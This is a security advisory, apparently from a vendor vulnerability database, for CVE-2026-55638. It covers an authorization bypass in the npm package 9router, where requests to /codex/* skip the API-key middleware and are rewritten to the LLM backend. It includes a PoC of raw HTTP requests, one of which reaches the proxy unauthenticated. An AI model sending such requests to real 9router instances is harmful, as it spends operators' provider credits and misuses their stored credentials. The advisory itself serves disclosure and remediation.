CVE-2026-55638

CVE-2026-55638 is a high-severity missing authorization vulnerability in 9router (npm), affecting versions < 0.5.2. It is fixed in 0.5.2.

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Summary

9router: Unauthenticated LLM proxy access via /codex rewrite authorization bypass

9router exposes an OpenAI/Anthropic-compatible LLM proxy. Remote access to this proxy is intended to be protected by an API-key check in the Next.js middleware.

However, 9router also defines a rewrite that maps /codex/* to the backend LLM endpoint /api/v1/responses. The middleware authorization decision is made on the incoming request path before the rewrite is applied. Because /codex is not included in the middleware's protected LLM API prefix list, requests to /codex/* bypass the API-key gate and are later rewritten to the same backend used by /api/v1/responses.

As a result, an unauthenticated remote attacker can access the LLM proxy through /codex/* and cause the server to make upstream provider calls using the operator-stored LLM provider credentials.

Details

Component File Note
Middleware authorization gate src/dashboardGuard.js Protects /v1, /v1beta, /api/v1, and /api/v1beta, but not /codex
Rewrite configuration next.config.mjs Rewrites /codex/:path* to /api/v1/responses
LLM backend route src/app/api/v1/responses/route.js Dispatches rewritten requests to the LLM handler
Chat handler src/sse/handlers/chat.js Uses operator-stored provider credentials for upstream calls

Tested version:

Version / Commit Runtime Status
v0.4.80, commit 23da7b1fe3bb8edd2bdbdb63fbbb15a476b02c56 Next.js 16.2.9 Affected

Root Cause

The middleware classifies requests by the original incoming pathname. The protected public LLM API prefixes are:

PUBLIC_PREFIXES = ["/v1", "/v1beta", "/api/v1", "/api/v1beta"];

Because /codex is not included in this list, a request such as /codex/x does not enter the LLM API authorization branch and falls through to:

return NextResponse.next();

The rewrite configuration then maps the allowed request to the protected backend route:

{
  source: "/codex/:path*",
  destination: "/api/v1/responses"
}

The backend route reaches the same handler used by the canonical LLM endpoint:

return await handleChat(request);

The handler then processes the request and performs the upstream LLM provider call. In the tested configuration, the handler does not repeat the same middleware API-key gate for remote callers, so the rewritten request is served after bypassing the intended authorization check.

PoC

The following requests use the same target server and the same remote-style Host header. The only meaningful difference is the request path.

Case 01, Protected canonical endpoint rejects unauthenticated access

POST /api/v1/responses HTTP/1.1
Host: evil.attacker.com
Content-Type: application/json
Content-Length: 156

{"model":"fakeoai/x","input":"NINEROUTER_CODEX_AUTH_BYPASS_MARKER hello","messages":[{"role":"user","content":"NINEROUTER_CODEX_AUTH_BYPASS_MARKER hello"}]}

Observed result:

HTTP/1.1 401 Unauthorized

This confirms that the canonical /api/v1/responses path is protected by the intended API-key gate.

Case 02, Rewritten /codex/* path bypasses the API-key gate

POST /codex/x HTTP/1.1
Host: evil.attacker.com
Content-Type: application/json
Content-Length: 156

{"model":"fakeoai/x","input":"NINEROUTER_CODEX_AUTH_BYPASS_MARKER hello","messages":[{"role":"user","content":"NINEROUTER_CODEX_AUTH_BYPASS_MARKER hello"}]}

Observed result:

HTTP/1.1 200 OK

The request reaches the LLM backend without an API key.

A controlled upstream provider endpoint recorded the outbound request from 9router:

POST /responses
Authorization: Bearer NINEROUTER_OPERATOR_STORED_KEY_MARKER
request-body marker present: true
operator key marker in Authorization: true

This confirms that the unauthenticated /codex/* request causes 9router to make an upstream provider call using the operator-stored credentials.

Case 03, Unrelated unknown path does not reach the backend

POST /notcodex/x HTTP/1.1
Host: evil.attacker.com
Content-Type: application/json
Content-Length: 156

{"model":"fakeoai/x","input":"NINEROUTER_CODEX_AUTH_BYPASS_MARKER hello","messages":[{"role":"user","content":"NINEROUTER_CODEX_AUTH_BYPASS_MARKER hello"}]}

Observed result:

HTTP/1.1 404 Not Found

No upstream provider call is made. This isolates the issue to the /codex/* rewrite.

Case 04, Canonical endpoint succeeds only with a valid API key

POST /api/v1/responses HTTP/1.1
Host: evil.attacker.com
Authorization: Bearer sk-REDACTED
Content-Type: application/json
Content-Length: 156

{"model":"fakeoai/x","input":"NINEROUTER_CODEX_AUTH_BYPASS_MARKER hello","messages":[{"role":"user","content":"NINEROUTER_CODEX_AUTH_BYPASS_MARKER hello"}]}

Observed result:

HTTP/1.1 200 OK

This confirms that the canonical endpoint is functional and that the 401 response in Case 01 is an authorization failure, not a backend error.

Attack Scenario

  1. A remote attacker identifies a publicly reachable 9router instance.
  2. The attacker sends LLM proxy requests to /codex/* instead of /api/v1/responses.
  3. The middleware evaluates the original /codex/* path and does not apply the LLM API-key gate.
  4. The rewrite maps the request to /api/v1/responses.
  5. The backend processes the request and performs an upstream provider call.
  6. The upstream call uses the operator-stored provider credentials.

Impact

A successful attacker can use the operator's configured LLM provider account without authentication.

Likely consequences include:

  • Unauthorized use of the 9router LLM proxy.
  • Consumption of the operator's provider credits or quota.
  • Unexpected billing impact.
  • Abuse of configured OpenAI/Anthropic-compatible providers.
  • Exposure of model/provider behavior through proxy responses.
  • Bypass of the intended API-key access control for remote LLM proxy access.

The application does not perform an authorization check before performing a sensitive operation. Typical impact: unauthorized access to restricted functionality or data.

CVE-2026-55638 has a CVSS score of 8.6 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.5.2); upgrading removes the vulnerable code path.

Affected versions

9router (< 0.5.2)

Security releases

9router → 0.5.2 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

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Remediation advice

Upgrade 9router to 0.5.2 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-55638? CVE-2026-55638 is a high-severity missing authorization vulnerability in 9router (npm), affecting versions < 0.5.2. It is fixed in 0.5.2. The application does not perform an authorization check before performing a sensitive operation.
  2. How severe is CVE-2026-55638? CVE-2026-55638 has a CVSS score of 8.6 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of 9router are affected by CVE-2026-55638? 9router (npm) versions < 0.5.2 is affected.
  4. Is there a fix for CVE-2026-55638? Yes. CVE-2026-55638 is fixed in 0.5.2. Upgrade to this version or later.
  5. Is CVE-2026-55638 exploitable, and should I be worried? Whether CVE-2026-55638 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-55638 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-55638? Upgrade 9router to 0.5.2 or later.

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